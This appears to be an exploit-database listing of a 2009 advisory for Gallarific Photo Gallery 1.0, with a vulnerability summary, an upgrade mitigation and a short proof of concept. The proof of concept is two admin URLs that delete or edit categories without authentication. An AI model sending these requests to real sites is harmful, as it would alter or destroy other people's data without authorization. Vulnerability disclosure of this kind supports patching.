header-logo
Suggest Exploit
vendor:
Gallarific Photo Gallery
by:
iLker Kandemir -- MEFISTO
7,5
CVSS
HIGH
Arbitrary Delete-Edit Category Vulnerability
264
CWE
Product Name: Gallarific Photo Gallery
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:gallarific:gallarific_photo_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Gallarific Photo Gallery <= 1.0 Arbitrary Delete-Edit Category Vulnerability

Gallarific Photo Gallery version 1.0 and prior is vulnerable to an arbitrary delete-edit category vulnerability. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable application. This can allow the attacker to delete or edit any category in the application.

Mitigation:

Upgrade to the latest version of Gallarific Photo Gallery
Source

Exploit-DB raw data:

# Gallarific Photo Gallery &lt;= 1.0 Arbitrary Delete-Edit Category Vulnerability

//Author: iLker Kandemir -- MEFISTO

//Price : 47 $

//script demo : http://www.gallarific.com/demo/index.php

//[imhatimi.org]

----------------------------------------------------------------
//exploit :

1) http://[site]/gadmin/gallery.php?task=delete&amp;id=1

2) http://[site]/gadmin/gallery.php?task=edit&amp;id=1

----------------------------------------------------------------
//Note:

/* You don't need access to admin-panel ;) */

side note:
Original Advisory without poC : http://secunia.com/advisories/29399

# milw0rm.com [2009-08-12]

Navigation

Suggest Exploit

Services By CQR